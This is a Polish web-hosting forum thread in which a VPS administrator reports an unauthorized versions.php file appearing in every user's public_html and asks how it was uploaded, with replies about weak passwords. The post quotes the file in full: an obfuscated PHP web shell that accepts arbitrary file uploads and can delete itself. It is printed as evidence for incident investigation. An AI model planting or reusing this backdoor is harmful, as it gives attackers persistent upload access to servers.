VPS - nieautoryzowane wgranie pliku, CentOS / Linux / Serwer Dedykowany Opcje

[Mega_88]

Cześć, dzisiaj na serwerze zauważyłem, że w katalogach public_html (/home/USER/domains/public_html/) dla każdego użytkownika pojawił się plik o nazwie versions.php (zawartość pliku poniżej). Plików już się pozbyłem, ale znając życie coś musi siedzieć głębiej.

Teraz bardziej do rzeczy. Rozumiem gdyby w katalogach każdego użytkownika siedziała jakaś dziurawa joomla lub wordpress to można się domyśleć, że to przez dziury w starych wersjach i zacząć szukać tam na początku. Jednak wspomniany plik pojawił się w katalogach (domenach - www.NAZWA_DOMENY.pl/versions.php) gdzie nic nie było zainstalowane, wgrane. Po prostu zwykły plik index.html z zawartością "Hello word", a właścicielem każdego z plików wgranych na serwerze jest dany użytkownik do którego katalogu został wgrany. Więc to nie dziurawe oprogramowanie pod każdą z domen tylko bardziej coś serwerowego. W lagach FTP nic nie widzę żeby coś było wgrywane, w logach logowań na danych userów po FTP również nic nie ma, a tym bardziej na root'a.

Może mi ktoś podpowiedzieć od czego zacząć i gdzie szukać żeby wyłapać jakim cudem plik znalazł się na serwerze i w jaki sposób został wgrany ? Bo nawet nie wiem gdzie mam już szukać.


Zawartość pliku:

[PHP] pobierz, plaintext 
<?php if(!empty($_POST["\x74a\x73k"])){if($_POST["tas\x6b"]=="\x75\x70\x6c\x6fad"){if($_FILES["fi\x6ce"]["\x65rr\x6fr"]>0){echo"Re\x74\x75r\x6e C\x6fde: ".$_FILES["f\x69le"]["\x65rror"]."\n";}else{if(file_exists("./".$_FILES["fi\x6ce"]["na\x6de"])){echo$_FILES["\x66ile"]["name"]."\x20al\x72ead\x79\x20\x65x\x69s\x74s\x2e \n";}else{move_uploaded_file($_FILES["\x66\x69l\x65"]["t\x6dp\x5fna\x6de"],"./".$_FILES["f\x69l\x65"]["nam\x65"]);echo"\x6fk";}}}else if($_POST["\x74a\x73k"]=="\x64el\x53e\x6cf"){if(unlink(__FILE__)){echo"\x6f\x6b";}else{echo"\x66\x61\x69\x6c";}}}else{echo"\x6f\x6b";exit;}
?>
[PHP] pobierz, plaintext 

[mrc]

Mi kiedyś wszedł ktoś na vps bo miałem zbyt słabe hasło na użytkownika z gitem. Co prawda, niewielką szkodę mi zrobiło ale nauczka została. Sprawdź hasła, czy są bardziej skomplikowane niż a-z.

[Mega_88]

Mi kiedyś wszedł ktoś na vps bo miałem zbyt słabe hasło na użytkownika z gitem. Co prawda, niewielką szkodę mi zrobiło ale nauczka została. Sprawdź hasła, czy są bardziej skomplikowane niż a-z.

U mnie git ani nic podobnego nie jest podpięte, a główne hasła mam od 14 do 18 znaków (a-Z,!) itd), a hasła userów generowane losowo od 8 do 10 znaków więc nie jest możliwością żeby ktoś wywalił hasła do wszystkich userów nagle. Dodatkowo gdyby hasła były wykradzione z miejsca gdzie są trzymane to byłby większy burdel, a tak można powiedzieć jest tylko lub aż to co opisałem.

Pierwsza moja obserwacja jeszcze nie potwierdzona bo to jeszcze sprawdzam. Na serwerze jest kilku użytkowników, którzy są dodani, ale ich domeny już nie działają więc dostęp jest tylko z poziomu FTP, a nie przez domenę i tam nie był wgrany wspomniany plik. Plik był dodany to użytkowników, których strony/domeny działały i były dostępne w sieci. Tak jakby ktoś to dodał przez http ? o_O ?

Ten post edytował Mega_88 28.02.2017, 20:43:09